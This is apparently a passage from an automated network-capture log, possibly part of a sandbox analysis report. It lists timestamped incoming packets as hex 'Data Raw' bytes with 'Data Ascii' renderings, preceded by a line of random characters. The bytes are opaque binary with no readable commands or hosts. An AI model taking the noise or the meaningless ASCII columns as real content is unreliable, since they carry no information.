xF"H}"NuTBl.Kfw~HkKG;CI$<.eu<a6Cy.pQQY(3o%,$"=s_dS<<: <nvx2K\_rkK$%+1\|3BcCi3H([8 Sgo6s}TIW-RIe4kF2m%:Nr0gzZjx
2022-05-30 12:45:59 UTC	851	IN	Data Raw: 52 03 18 54 22 14 8c 38 42 ac ee dd 4c ce 7d b9 93 8a c8 c9 68 cb 01 82 55 3f cd 3f 67 59 35 44 43 0a d9 25 1f b6 22 8c 4d 73 84 ba 4c 39 d8 0c a6 48 4b 91 f0 b7 69 97 38 cc 12 7e 9b 9c de d4 ff 53 94 02 ee 67 f4 d3 69 73 b2 c7 a8 e9 8e 64 09 03 bc 61 c2 98 7b 07 9e 4a bc 52 51 ec 23 7e e7 bb 0c 20 d4 d9 42 be 2e cb d9 3f fd 94 07 f2 95 57 8f 3e f5 b3 61 4f c9 fc 02 bf 63 80 a4 47 eb 2e 6d 0f 9b 84 7f 49 35 65 a0 12 5f 30 9e f7 f2 21 c9 38 3a 02 3a 7d 3b 8c f7 e2 48 21 c7 72 3c 65 54 cd f0 0c f7 19 54 ac ba 73 89 de e7 46 27 7d ae 47 13 10 2f 0f 47 77 3a 79 64 aa 1c e0 fc f2 46 ad 7c c0 08 75 dd 38 7d db 07 2e d9 eb e4 fa 1d ef 75 5e 49 55 c6 2f 10 92 b5 3e b1 1b 69 9b 2c 8d d8 4e 46 79 47 aa e1 4d 76 ca 65 9a 65 76 e2 ef f8 8d 36 6c 0f d5 1f d1 fc 3b 62 Data Ascii: RT"8BL}hU??gY5DC%"MsL9HKi8~Sgisda{JRQ#~ B.?W>aOcG.mI5e_0!8::};H!r<eTTsF'}G/Gw:ydF\|u8}.u^IU/>i,NFyGMveev6l;b
2022-05-30 12:45:59 UTC	852	IN	Data Raw: 60 a0 7a c0 e2 58 a2 b2 10 63 fb eb ff 2e 55 17 17 c3 b2 5e 8a 11 48 35 43 d9 37 cf d5 fe 5d 67 22 7e 2a c6 e3 d7 77 46 cc 12 62 c5 44 e6 c8 a5 55 62 78 c6 40 5d b5 06 8b 99 86 f6 4c 6e f6 3b 14 7b 67 e5 9e 91 94 fd 33 09 ad e9 00 03 54 41 72 df b3 8e f4 16 81 b6 a0 65 f9 5e fb 46 b5 ff 1c 77 03 22 79 49 d2 fe b7 df fd 11 4f 61 1c a6 0f fe b0 94 56 32 c7 ea 3f 17 37 36 c5 8c 83 9e a5 f7 09 bd 43 59 47 b9 63 2f dd ad 43 99 fc 69 42 82 9c 41 cb f4 3c 01 ee 55 ba 33 c7 47 15 6b c4 99 31 d1 e0 b5 6a 3d df fd a8 e7 d2 cd f2 b6 83 55 94 35 95 47 c1 33 7a e9 87 35 c6 ac c9 c3 68 8b e7 28 35 b1 d3 d4 7e 20 81 73 5e 4d a5 03 46 b0 08 a2 f5 9b 78 8e 7a 24 d7 eb 3d b7 f2 72 1b 78 c9 46 df ef 6f 7c 12 0a 9f 73 2a 1f 1f 14 4c 64 4d a6 8a 5e 73 b1 dc 27 52 3e e4 3f 54 Data Ascii: `zXc.U^H5C7]g"~wFbDUbx@]Ln;{g3TAre^Fw"yIOaV2?76CYGc/CiBA<U3Gk1j=U5G3z5h(5~ s^MFxz$=rxFo\|sLdM^s'R>?T
2022-05-30 12:45:59 UTC	854	IN	Data Raw: 0c a6 15 96 92 36 03 8a 22 16 6c d9 4f 1d dc 5a 4b ee 4c e8 bd 28 d3 39 1f cc f9 76 1a 16 3c 26 14 63 28 84 b2 cf 1f 85 94 12 81 cb 03 3a 20 b3 41 af ca 19 a3 ff fc 98 d6 2d dc 81 47 10 5b cc 44 71 5e ab 60 f0 32 b8 39 2f 13 2b 98 0c c1 42 54 60 08 2e d7 9b 00 11 9e 48 b7 dc 0e 83 83 74 1e fe 26 b5 c7 a9 23 ae f3 2e ae c4 d5 48 28 53 fe 70 35 7f 3b de 93 a5 32 2e 7a c1 b2 73 3b 98 50 85 68 2f 6b 19 dd 4e 27 67 dc 6e 6d d2 9d d0 32 02 70 eb 2a e7 3e 32 05 40 8b e7 85 0a eb 40 82 21 1a 77 33 e8 65 b9 4a 4a 5b 85 34 b2 0c 36 57 34 4f 56 33 c3 55 6f 33 ea 6d 48 c2 93 7f f3 98 2d ec dd 30 fb 88 c6 a0 8a 06 81 6c 93 eb 76 71 b2 53 0e e7 ed 80 c6 a4 63 f8 3d c5 50 6b e8 5e 30 5a 46 c5 1e b0 79 06 ab 75 61 50 37 dd 58 a2 de 85 a0 d1 1c c0 2e 15 7c 02 07 98 a9 b5 Data Ascii: 6"lOZKL(9v<&c(: A-G[Dq^`29/+BT`.Ht&#.H(Sp5;2.zs;Ph/kN'gnm2p*>2@@!w3eJJ[46W4OV3Uo3mH-0lvqSc=Pk^0ZFyuaP7X.\|
2022-05-30 12:45:59 UTC	855	IN	Data Raw: 75 f7 87 f8 c2 eb 57 03 8a 61 9f 22 47 34 93 ef 62 d9 38 76 b0 0b 93 2b 36 6b 3d dd bb 4f e3 ac d7 ce 99 4c b5 5f f4 84 ad 46 4a 88 13 fe bb 4d dd e1 b3 6e 12 ac 74 14 3f 23 8e a3 d7 ae 33 1d 92 8d 44 70 34 e7 4e d7 56 d1 74 76 f8 8a 38 a2 fe 11 42 2a 40 5e 33 54 b5 19 96 44 18 69 fe 4e 53 da 9c e7 5e d6 0f f0 24 a8 93 36 b6 71 c7 cd f4 b6 e0 3f fc ce ac cf d6 90 73 ef 1b a7 52 e7 8e db 90 19 d6 dd cc 9d a3 50 19 df 5d 88 00 06 9e d3 ee 58 8a e8 c5 2b 66 39 d2 84 b8 bd 14 d0 a4 79 5e 54 ca 2d d7 0a 7e 1b 3e a2 1f a2 d5 c7 f8 58 ed 24 c7 31 5e 27 f1 8a 9a 9e 69 d0 93 eb 16 7e 1e 66 82 2a 34 19 a3 f8 59 e1 d6 0a 9e 94 54 9f bb 67 78 ef 58 52 4f b7 1f 46 00 a0 c2 f4 ff 4f 6e e9 df a6 0d 22 4e 38 cf 6a 3d 61 ad 36 21 a8 f2 84 46 8f 1a a4 d6 d8 57 23 64 1f 82 Data Ascii: uWa"G4b8v+6k=OL_FJMnt?#3Dp4NVtv8B@^3TDiNS^$6q?sRP]X+f9y^T-~>X$1^'i~f4YTgxXROFOn"N8j=a6!FW#d
2022-05-30 12:45:59 UTC	856	IN	Data Raw: 48 5d f5 d4 c0 33 20 b8 1a 6b 03 72 7e 8c a1 ed 05 d4 1b 86 8b a0 43 6c da 91 76 93 c0 8b 97 ad 68 af 61 98 c3 f7 fc 68 4e 26 39 3a 99 3c 8d 67 8f e0 7b 80 d7 7f 37 22 df a2 04 a5 a1 32 f4 dc 45 75 4a 09 84 e3 32 c8 cd 25 21 da 56 41 1a ee 7e d3 e6 05 3c 6e 4f af d7 a3 af 33 54 c9 94 60 d4 fd eb 7f 00 1f ea bd 00 3f c2 e5 09 2d d9 b3 eb 0e 8d e5 8e ba fd 92 0c 2b 73 df 7c 1f 44 90 5a 67 08 9f 69 be 31 94 c9 b2 f2 b3 bc 7e 1f 80 ce 2b 88 50 33 7a 2b c2 15 d6 38 e4 cd 5e 69 dd e2 44 2e 5b c1 12 06 8a 47 c1 40 09 ab 30 67 66 95 af 88 3f 0c 9c 2e 47 b5 0e 10 42 74 bb 10 49 29 bb d8 15 8f cc 12 ac ca f8 93 37 09 45 f8 0e 83 46 27 4b 7e 2a 1b 5e 77 c4 16 d8 08 5b df e4 66 ba 66 95 35 af 6b 18 f9 64 a6 c6 d8 85 9c 0d 62 2d ea d4 f5 65 7a 34 c2 37 39 ea 27 c2 8f Data Ascii: H]3 kr~ClvhahN&9:<g{7"2EuJ2%!VA~<nO3T`?-+s\|DZgi1~+P3z+8^iD.[G@0gf?.GBtI)7EF'K~*^w[ff5kdb-ez479'
2022-05-30 12:45:59 UTC	857	IN	Data Raw: 1a af ef 31 07 3e ac 59 b6 15 20 e8 ff d4 1a 1d 3b 18 24 02 ae f0 1a c8 c7 73 59 c7 c9 1e 87 33 3e 09 f6 21 11 b8 36 d0 36 0e c9 69 ee 7e 07 20 9a f6 21 92 1a d7 7f 1d 91 81 31 77 25 10 f3 7d 7e a6 86 dc f1 ae ae 9d 0d eb c8 d8 6d f2 76 65 1a e6 b8 3f 8d 14 26 58 ea b8 4d a4 fd c2 52 0f 16 ff 17 65 06 29 1b 50 1b b4 7e 2f 8b 97 45 5a 81 f8 5c 55 d0 08 11 a6 e1 25 24 37 4e d8 5d f9 82 fb c4 88 79 56 cd 73 3c aa 07 a1 cb 71 dd 46 a5 32 52 7f 78 52 45 af 77 e4 45 5e 55 de 5d 4f d1 11 e1 4e c7 a6 19 8b 2c 41 06 ec e5 a2 b2 90 0b 02 23 3e 90 04 bf a5 f8 a9 16 f1 ac 48 35 c3 bc cf 47 17 40 80 5b 34 0a df ca e1 6a 77 46 0c 78 99 8d 87 58 85 6a a7 24 57 64 38 e0 b5 06 4b 56 7d 3e 8f d0 e2 2e 0a 7d 55 a1 a3 2c 94 fd 33 e8 57 61 c4 bd ec 29 67 2f 6b 2c 8d ab 81 b6 Data Ascii: 1>Y ;$sY3>!66i~ !1w%}~mve?&XMRe)P~/EZ\U%$7N]yVs<qF2RxREwE^U]ON,A#>H5G@[4jwFxXj$Wd8KV}>.}U,3Wa)g/k,
2022-05-30 12:45:59 UTC	859	IN	Data Raw: c1 5e 40 31 df 49 1c f5 50 80 e1 ca 9d dc ee 42 a3 4c 92 e6 6b e5 14 18 9e fa ed 0c 71 f1 c0 33 7b 5b 75 f2 0f e5 e8 e5 fb 16 ef 35 f2 57 bc bd 80 2b c4 3b ab 9f 02 3b 7b 59 1f a0 d8 39 db f8 de 35 90 b6 90 a6 bb af 5b e5 5a f2 39 7d 89 85 1d f2 4a 6d d9 b1 25 d0 61 2a 51 e6 ef 46 46 9b 03 fa ea 0f 44 2d 7e 87 e3 dc a4 26 f8 42 c7 bc e4 92 2a 87 1e 95 9b c9 2c 24 f1 60 d4 fe 64 c6 fa 5a 74 85 5a 08 64 dc 65 e3 36 6d ab 21 d9 ad f0 66 1c 51 7f 78 da 46 f0 f9 f6 31 cb c6 28 a0 a6 0e 8b 1e c9 af b2 f6 10 a7 10 5e 09 e2 60 60 28 93 14 e6 a1 ba 82 0e 03 f7 93 71 17 6f 3d 06 8f 61 14 bb aa cb b9 31 29 e6 d4 7e f0 fd 70 f5 ba a2 d8 49 86 c5 1b 12 11 f2 2d 6f c0 3f b1 4b 66 31 89 e6 ac 79 f8 56 41 ed 82 ac cf 89 26 89 45 0f 06 2d 30 dd c2 78 1e 58 23 1b a4 f3 e8 Data Ascii: ^@1IPBLkq3{[u5W+;;{Y95[Z9}Jm%aQFFD-~&B,$`dZtZde6m!fQxF1(^``(qo=a1)~pI-o?Kf1yVA&E-0xX#
2022-05-30 12:45:59 UTC	859	IN	Data Raw: d3 fa ec 08 23 d7 bb 29 a4 d9 8f 09 84 62 90 cc 5d 16 38 0f 98 d6 fb 6c 45 bb 2a 59 0c c8 01 b0 55 33 19 1e 87 81 da af 21 c6 27 7d 07 dc 7c 12 b8 38 22 5f 58 45 7e 49 b9 58 21 91 c1 64 1b a0 6e 71 1d ab d4 a0 ca 7a 63 87 ae 89 f8 1a 30 bb c4 32 8f 4b 01 3a c8 f8 a7 b1 61 5f 6d 1c 57 80 63 8c 3f 12 4b c1 3f fc d0 24 08 70 3f bc 5f 1c c5 b1 73 d7 41 7c 81 80 37 0f 0f 45 2b ea 70 19 bd 84 61 b9 42 a3 98 e3 f4 0c 8e 5a ea e1 ed c3 db c7 11 48 3d ae e0 f6 93 e2 9b 28 ac 41 61 89 ec 2a 68 98 b3 50 80 67 21 79 1a f2 a1 f8 13 63 39 67 8b be fe 85 76 d4 df f4 28 59 fd d7 cb 36 c0 83 36 4a 29 90 a1 d6 7c 10 37 98 92 8d 7d 3f a3 50 26 49 cc 12 8e 92 c0 2a 03 e6 bd 11 23 9c 09 cf a7 f7 99 46 72 f8 4b 9f 40 8a b2 1f 9a 9e e8 37 8c a1 80 80 27 79 71 23 7f 17 a3 cd 1a Data Ascii: #)b]8lEYU3!'}\|8"_XE~IX!dnqzc02K:a_mWc?K?$p?_sA\|7E+paBZH=(AahPg!yc9gv(Y66J)\|7}?P&I*#FrK@7'yq#
2022-05-30 12:45:59 UTC	861	IN	Data Raw: ff 4f a9 7c c3 ed d6 8b 9f 15 cd f7 e2 a5 e3 ff ec 69 9a eb 08 3f 20 6b 80 fb 62 5c d4 1c 4a 42 d7 69 63 79 0d d2 2a 12 07 2d 72 77 a3 89 76 ad 03 e4 ac ce 70 0e c4 f8 4e 44 41 df bd 24 26 bc 73 9d c7 bc d5 82 e5 6c 3c 90 80 cb 7e 81 02 45 1e df 24 1d c2 49 96 36 93 d3 7e 3e a5 f2 df cd b3 43 ea 14 0e 12 57 b1 85 f2 d1 e7 9d 1d 15 09 b6 4b bc d7 14 dd 58 db 4f 29 08 80 48 dc 11 36 9f 7e 54 a2 39 fc d4 ba 37 94 e7 97 53 58 31 44 b2 6c 2d 2d 11 93 9c 88 21 6b 2b 3f 85 45 10 10 41 43 27 7f 2d 39 99 a2 68 a2 54 15 07 bf f0 54 be 54 50 9e 24 ad 38 70 14 61 73 46 52 f9 97 89 a4 d7 8d 19 54 87 1a 12 1a 1c a4 e3 c0 17 05 37 ce e0 23 d2 45 4e fd 4f 44 17 9b 67 b2 b9 5e 74 99 65 0d 21 b9 cd af e2 cf 0c d9 7b b7 90 5f 74 98 76 e4 77 11 cb ec 2a 3d b8 42 57 10 8b a4 Data Ascii: O\|i? kb\JBicy-rwvpNDA$&sl<~E$I6~>CWKXO)H6~T97SX1Dl--!k+?EAC'-9hTTTP$8pasFRT7#ENODg^te!{_tvw=BW
2022-05-30 12:45:59 UTC	862	IN	Data Raw: a9 33 09 66 69 bb 33 ea 48 00 36 ab 38 20 88 04 de bb c0 27 67 6f 36 8d 73 7b bb c5 cc 7d d8 54 19 9d 6d 72 2d c9 99 52 d2 4d 34 26 49 65 1c 15 e7 ee d6 d1 0b 9e 10 ba 0a 8b e6 16 6d 0f 80 0c e8 05 1f 1e 07 4e 72 0b b2 64 5d 43 7a 5a a1 0c c3 3d 04 e7 a4 78 bf fd 93 87 df 0c 62 f9 2a 0f fb 70 ea b4 da 13 76 53 93 93 83 a2 e2 46 f9 d8 ed f8 33 37 32 ed ca fa 50 eb 52 0d 62 4f b1 fa 1e 30 c3 15 f8 60 96 6f 37 dd db 71 8d 90 57 ee 1c c0 ad 86 28 17 f0 a7 a9 4d 5f 9b 0a c3 e8 22 38 12 b0 8e 58 62 4e 3f 31 a4 c0 a4 79 0c 3c 77 32 03 f1 1b 9a 15 4f 6d 31 0f be 67 39 4b b2 93 01 03 8d 24 04 94 51 72 12 41 23 46 c2 33 20 b8 1e df b1 86 7e f2 f8 a6 79 13 68 53 89 a0 43 ec a9 1c 38 67 c0 dc 53 16 d5 0e 07 00 c1 f7 fc e8 e6 38 2f ce 99 cf df a5 63 d1 2f 15 d5 7f 37 Data Ascii: 3fi3H68 'go6s{}Tmr-RM4&IemNrd]CzZ=xb*pvSF372PRbO0`o7qW(M_"8XbN?1y<w2Om1g9K$QrA#F3 ~yhSC8gS8/c/7
2022-05-30 12:45:59 UTC	863	IN	Data Raw: 19 2d c1 76 59 88 2e b8 71 84 a2 6c c0 75 4c b7 bf d2 f9 2f 89 84 cd 53 d4 37 83 9a c1 83 67 87 f4 92 4f d9 d1 24 93 40 ce 61 6f c5 ad 3a 73 95 48 be 8a 89 64 8b ab f1 d4 7b be e5 2e 2b 23 85 61 12 11 4e ac 96 c9 5e 82 90 a9 c7 27 e1 53 9c fe 7d 02 f0 2a e8 b5 3b a5 e7 d1 a2 60 9d 1b d3 86 6a 05 83 1b d7 b9 cb 41 fb f1 f4 c1 f7 1d 31 5e e2 3f a9 01 bd dc 5d c2 ae 91 8a 6e cf fa e0 d7 d6 1a 0a 75 a9 44 74 08 c2 58 23 de 4b fa 1c 41 05 69 dc 5a 4f 07 2a 6f ee 49 aa 74 fa c0 9f e0 42 73 3c 26 93 78 49 3e e8 bc 6c e4 f3 09 94 3c 7f 56 4f c0 64 91 b7 8f e8 ff fc 98 17 51 c9 76 78 10 5b cc 27 60 2f 72 3a 88 57 b8 2a 2d 75 a8 c2 61 85 30 bd 6c 78 d9 b4 9b 00 11 54 31 a2 2b 77 83 83 74 2c 87 33 42 97 a9 53 ae d6 56 d5 33 ea 48 28 53 4d 07 20 88 35 de 93 a5 c2 58 Data Ascii: -vY.qluL/S7gO$@ao:sHd{.+#aN^'S};`jA1^?]nuDtX#KAiZOoItBs<&xI>l<VOdQvx['`/r:W*-ua0lxT1+wt,3BSV3H(SM 5X
2022-05-30 12:45:59 UTC	865	IN	Data Raw: 71 b7 bd 10 ed 96 bf d3 ad 36 dc c2 aa 1c 87 02 e7 fd 92 c2 f9 f7 8f f1 75 98 f2 df 0a ea 95 e7 e3 31 94 84 61 16 e3 37 9b a0 1d 55 ca c0 3e bb 27 2b c2 1c 02 ec b4 44 c6 75 dc b1 e0 b4 29 4b 4f 06 8a 84 15 44 59 2c d1 6e 58 51 b5 05 35 88 c1 2e 47 c9 db 64 12 fa 31 e5 45 d0 75 e7 1e 03 fd 4f ac fe 2e 37 64 87 10 67 bf 90 91 33 79 98 6f 75 3a bd 7d bf ed d4 05 06 89 75 0f 9b d6 ec f2 66 12 6a b9 39 d3 67 f4 a6 54 d1 0f 2f bc 1e 38 77 3e c8 bb 33 87 ec 5b ff d8 ed e4 b2 0a fb ff f4 20 8e 8c 60 85 b0 32 e8 ff 7e 22 de 9f da c7 2e fe bb 4d 54 c8 b3 61 76 c8 50 96 56 77 44 56 b0 ef 5f 69 00 fb 84 7f 50 c0 d7 97 c6 3d 17 35 9e c9 4c d0 69 4b 5f 3a 24 6c 10 25 08 25 b0 7f 28 63 a5 0b e2 a9 2c 98 07 19 0b df 6d 46 98 61 ea 03 a3 90 0f a4 10 2f ce dc e6 c3 6a a3 Data Ascii: q6u1a7U>'+Du)KODY,nXQ5.Gd1EuO.7dg3you:}ufj9gT/8w>3[ `2~".MTavPVwDV_iP=5LiK_:$l%%(c,mFa/j
2022-05-30 12:45:59 UTC	866	IN	Data Raw: ca 6b 4e 1e 0b d7 0c 53 97 35 5a 81 0c f2 55 5f 33 ab 78 8f fd 99 7f f3 d8 5d f9 2a 0f a8 88 a3 60 91 13 56 53 f5 eb 05 71 b2 46 d9 d8 d0 80 e6 e4 4e ed b8 fa 35 6b 89 de 29 4f d4 fa 51 b0 1b c6 ad 60 f3 6f 54 dd 2c a2 9a 90 75 ee 4f c0 4d 55 65 17 99 a7 d9 b5 65 48 5c c3 86 22 5f ea d0 5d 21 62 27 3f 5d dc b2 77 15 0c 45 77 41 7b 92 c8 c0 15 22 6d 7e 7f 3f b5 6c 4b d7 93 62 73 1a f6 19 94 78 72 18 a1 91 94 f7 33 20 b8 78 3f 70 54 2e f2 d6 a6 3d cb 73 81 da a0 26 ec dd c4 23 b5 b9 dc 3a 16 b9 46 2c d2 de f7 fc e8 c4 70 43 1c 84 cf f3 a5 43 69 02 c7 ea 7f 37 22 82 fa fe 83 fb 65 88 1c 3e 7c 3c 47 f6 e3 50 c8 30 7c fc fc 0a 42 ea 89 9e f4 d6 3c 56 6e 1c af a7 f8 35 15 02 c4 f0 24 52 df 9b 6a 6e 1f 82 bd 75 ed a1 f2 da c3 61 81 eb aa 69 c1 61 ba 88 92 ac f9 Data Ascii: kNS5ZU_3x]*`VSqFN5k)OQ`oT,uOMUeeH\"_]!b'?]wEwA{"m~?lKbsxr3 x?pT.=s&#:F,pCCi7"e>\|<GP0\|B<Vn5$Rjnuaia
2022-05-30 12:45:59 UTC	867	IN	Data Raw: 38 9a de 8c 4e ce e6 f5 a6 16 e8 42 a8 ac 6e 41 c1 30 f6 94 11 80 c3 84 ee 09 bd 0d bd ad 61 13 9a 36 d1 a4 9b 66 ff ed c0 e5 ed 1d 24 5e b1 14 89 30 a7 ca 4e 93 f0 f4 ee 2b 80 8f 8d 93 fc 06 14 77 ad 5e 4d 0e c3 5f 77 e5 50 e4 79 69 15 69 91 35 65 07 2d 70 f0 61 bd 5f f0 e4 ec d2 4d 7a 4b 47 a4 74 13 17 e1 a3 1f b4 94 6c 94 6c 3c 48 20 dc 01 b5 df 9c 9c 9e fc f5 16 71 c9 30 78 79 5b a0 44 68 4b 2f 5f ac 32 b8 79 54 06 8c a7 7e c1 2d d4 7d 1d ab e8 fa 00 7c 5e 11 a2 6d 31 ea 83 18 1e e2 33 31 f8 89 23 86 b3 2e bb 0b ea 7e 28 7a 7e 5b 20 88 04 de 93 ca 84 3d 1d 44 e4 17 5e 98 10 f3 7d a8 54 6d dd 26 a7 4d c9 ec 52 bc 9d b5 f2 18 65 7f 15 e7 3e 01 2b 00 b0 21 9a 5a 99 2f c2 52 0f f6 0c e8 65 c5 ca 38 4e d4 0b b2 0c 36 97 45 5a 8e 67 e3 70 18 5a f5 1c d6 8f Data Ascii: 8NBnA0a6f$^0N+w^M_wPyii5e-pa_MzKGtll<H q0xy[DhK/_2yT~-}\|^m131#.~(z~[ =D^}Tm&MRe>+!Z/Re8N6EZgpZ
2022-05-30 12:45:59 UTC	868	IN	Data Raw: 81 60 f4 e9 b0 b5 82 db 5a 1f b1 13 f1 9a b1 36 97 8a 2f 3a 76 f8 32 64 ee 48 ba 85 a4 62 17 92 23 68 d1 c4 fb 97 b7 eb 01 94 63 b7 b2 45 cf 58 99 ed cc 9d d7 4d 94 61 0e f7 13 19 5e 63 28 58 ee c4 a7 0a 00 49 bf ff 15 f5 c8 1e 4f 5d 21 2d 74 34 b8 37 e1 3c 85 c5 3f 79 d8 2c a7 50 98 cb 1b ac 03 e9 d9 c1 0c 10 16 18 57 e9 e5 61 5e ef a5 03 7b 92 df 9a d2 85 d9 b2 02 d9 4b 48 3e 00 0e 3a 75 8b b2 1b d2 8e b1 c2 32 3c 7f e4 91 d1 a3 98 2b 31 26 8b 18 25 68 58 83 20 7e ad b3 87 4a d0 1d 56 17 b8 a4 f9 e8 11 24 ea 9b 67 c0 06 9d db 18 bc 0c 25 79 45 5f 72 25 7b 21 e8 c6 85 6e fa 8d da d2 03 e4 93 f9 81 6a 33 b9 44 c8 3e 2d ce 00 d6 4a cc ac b9 aa a9 e0 7f 41 73 58 24 fa 2d a5 1a ed d9 d3 21 89 c4 cd bb ea 2c 19 c4 91 f3 d8 be d6 40 d1 9d 8a fe 62 60 4e b8 a8 Data Ascii: `Z6/:v2dHb#hcEXMa^c(XIO]!-t47<?y,PWa^{KH>:u2<+1&%hX ~JV$g%yE_r%{!nj3D>-JAsX$-!,@b`N
2022-05-30 12:45:59 UTC	870	IN	Data Raw: eb 52 8c 0f a0 90 4b 3e 46 4f 35 07 43 7a 89 0a bb 97 1b 69 e2 1a b3 ce 04 c1 f9 9d 2e 4b d4 49 22 86 41 75 4e 3f d2 1d c6 13 db 3c c4 44 59 bd 8b 52 c1 df 47 99 7b 1d 6a 03 32 51 81 b8 72 13 96 a3 2a 78 50 36 37 bf de b3 ca a7 35 d5 b4 54 37 78 03 6e 3e 0f 01 7a 65 53 04 fb e2 28 c5 f0 b7 84 ad 16 44 1e a1 9d 67 ae 98 24 03 0f 2b 39 1d 1d bb f9 da 30 d3 51 69 8d 02 78 79 03 c3 fa 57 8f 9a 15 25 6a 6c 8c 9b da 7f b3 2a 65 c5 8a a5 f4 ae e4 53 5f 9d 86 21 14 ff 23 3c 6d 4d 09 89 3c 7f b1 41 dd a7 f3 eb 27 5f 6e 65 9c 23 25 26 67 3d 00 39 0e 8f 9b f5 7a d7 16 4a 52 24 92 41 c4 b0 40 7f da 4b 54 e5 e8 34 48 9b 17 a7 f7 0f 3e 6a e0 aa ec 2b bc 1b a4 be 37 77 4e 3c ef 42 16 33 1c 49 bf ec f2 b6 52 23 26 0a 87 10 7d 24 82 bd f4 a9 23 7c e3 20 b1 58 cc 10 82 86 Data Ascii: RK>FO5Czi.KI"AuN?<DYRG{j2QrxP675T7xn>zeS(Dg$+90QixyW%jleS_!#<mM<A'_ne#%&g=9zJR$A@KT4H>j+7wN<B3IR#&}$#\| X
2022-05-30 12:45:59 UTC	871	IN	Data Raw: 38 65 27 d2 67 5d 17 26 7d f5 2f 2d 28 5b a0 78 1a 52 e4 ac 69 b4 8a c5 ae 37 13 77 c4 2c cf e7 4b eb 1e 9e 88 c8 1f 18 0d 35 0b 46 36 d8 ea 8f c6 cc 05 15 c3 55 56 f8 76 a8 c1 4d d9 47 2d a9 e8 0c 26 63 41 e0 24 20 8b f4 89 98 7f d5 5a ad d4 da aa 57 ac f7 42 b4 fc 5f 74 6a 29 be ab 0a e8 77 3a 7e 72 8c 64 32 a5 d3 8a d4 8c 0c 6b 52 33 83 4a 5b 9e 8e b3 80 9b 8d 8a 81 56 07 b0 9b ba 70 27 15 8c 75 77 d6 13 c5 91 8c 61 29 08 6e 92 33 78 85 26 f5 49 64 b0 ac c5 ca bc 87 08 b6 0e b7 50 4e bf 34 e9 6d cc 30 21 6e f3 16 f5 33 52 60 37 52 e4 6e a4 58 30 67 4e b8 0e d3 58 80 a7 b2 b9 0c 18 a8 93 9a d5 be 80 3e e5 63 e7 07 11 b3 dc 94 ef cf 3a 33 e8 28 1d 31 7a 4d 68 9a 68 fa 3e 59 7c 6e 30 9c 76 45 f1 74 8d 98 c0 ac 58 cd b6 2e e2 03 2c 20 38 96 e2 57 e5 38 b2 Data Ascii: 8e'g]&}/-([xRi7w,K5F6UVvMG-&cA$ ZWB_tj)w:~rd2kR3J[Vp'uwa)n3x&IdPN4m0!n3R`7RnX0gNX>c:3(1zMhh>Y\|n0vEtX., 8W8
2022-05-30 12:45:59 UTC	872	IN	Data Raw: f0 90 50 59 44 33 0f 31 73 13 a5 ba af 51 58 e1 8a 84 86 72 58 30 03 44 53 b1 bf a0 03 b9 9a 35 85 98 7d b5 ee 1d a7 4d 37 98 01 e2 7d e7 79 3d a0 47 c4 88 da 10 01 df 8d 4c a7 1a 57 a0 6c 3d 44 f7 a7 d3 2a e8 d2 a5 02 28 20 d0 a0 34 a6 01 0f 50 fd b8 ba 01 74 47 31 b3 bc e6 f4 d6 56 94 fd ad 61 f7 0e 67 b6 01 3c 4f 94 11 5e ce ca 05 a0 26 3d d1 f2 26 17 8f c0 dc 49 c4 78 74 0c 71 0c a9 2f ce d4 3a 9e 1f c7 d4 88 15 62 1b 0f a0 da c0 ca 36 55 89 c9 cb 52 c0 d2 9f 89 39 cb de 53 fc 28 9b fc 90 22 62 7d 4d 49 82 f9 23 95 f4 e1 c0 0d c3 a8 60 f4 72 f4 4b 63 e7 ad e8 c2 ab 32 e0 97 5e 35 7e 49 d8 2c 2f 53 6f 19 6b c7 d7 26 f3 a5 96 82 c2 43 89 45 f8 42 d1 61 a2 d4 ce 2e f1 06 1c 34 5d c4 d5 62 21 7c 5b d7 13 5c 69 5e 64 5c b2 a3 a9 a3 62 3d 40 57 60 6d 5c 62 Data Ascii: PYD31sQXrX0DS5}M7}y=GLWl=D*( 4PtG1Vag<O^&=&Ixtq/:b6UR9S("b}MI#`rKc2^5~I,/Sok&CEBa.4]b!\|[\i^d\b=@W`m\b
2022-05-30 12:45:59 UTC	873	IN	Data Raw: 44 6a 6f 10 25 63 fb 98 fa 4e 19 db 25 cb 95 1f 9e 93 04 a7 34 06 a9 23 0b bf 4c 16 cc 51 14 d1 40 36 ad 00 76 ac b8 46 80 5d 20 de 8b 40 3a 46 d3 9a 6f a1 9c 66 73 63 09 2f 20 c3 9b a9 5c ca bc d6 c8 bc 69 a0 5a 65 d1 04 61 48 fe a6 b1 c6 bc 01 c9 f0 6a f3 13 a7 27 f1 a3 1c 05 5a fe 89 aa 94 4b 7f 7c fa ad 30 dd 32 0d 53 d9 b0 72 3f a4 95 13 8c d7 30 5f 43 b5 a0 c5 db 3c 8b e1 f9 3f 5d 3f 17 91 6e cb 3a 80 da 32 36 64 e4 59 dd 06 8c 6f a0 43 ef 06 8f 55 10 55 27 69 0b a2 4d 62 d2 52 06 55 62 ee 4c b9 42 42 ae 6b 77 41 63 9e 2d 00 57 09 4e 27 09 7b be d5 d2 99 f7 0a 4e a4 60 84 91 b3 30 8e ba 48 46 08 e2 5c aa 2f ab 3a b6 fb c8 a9 5d 18 11 d8 37 23 70 40 d7 41 7c b3 ee b0 a0 93 b5 c6 c0 ca 67 8d db 16 f6 1c b3 60 98 4c e5 13 9a d4 48 d4 64 cd fc 2d b5 83 Data Ascii: Djo%cN%4#LQ@6vF] @:Fofsc/ \iZeaHj'ZK\|02Sr?0_C<?]?n:26dYoCUU'iMbRUbLBBkwAc-WN'{N`0HF\/:]7#p@A\|g`LHd-
2022-05-30 12:45:59 UTC	875	IN	Data Raw: 9d 23 8f d6 aa f8 45 33 0b 6e 05 e4 b6 8b 24 71 79 0e 31 b5 cb d5 71 1c d5 fa 71 ff 67 60 e6 70 1f 61 a8 ed 7b 61 d5 6a dd 25 f2 e4 13 8a 21 04 89 0b 22 c1 27 16 f3 e4 c3 da 72 78 b9 9f a5 6c 38 4f 71 b4 f1 e6 3a 9e a6 38 52 f5 18 13 af b3 70 9d ca bc 7f 9a d9 f9 14 02 fb 58 ca e8 60 55 b6 90 95 31 b2 1d 04 1d 2e 9c 50 44 b9 59 62 85 10 65 02 9e 95 2f 0b 78 49 55 e8 a2 1e b5 32 09 e7 26 29 ba bd 91 fb ea 27 8c d5 57 6e 96 d0 24 93 50 e1 1a 59 86 e0 4c 71 da 64 6d 54 2d af 21 8a 20 cc 3b f8 72 11 52 da 51 11 f2 c4 fa 00 8f a6 1f c6 2b 56 e1 e0 f1 51 a7 a9 03 46 54 01 4b 43 0d 80 a1 68 30 cc b7 68 88 b5 07 ce c0 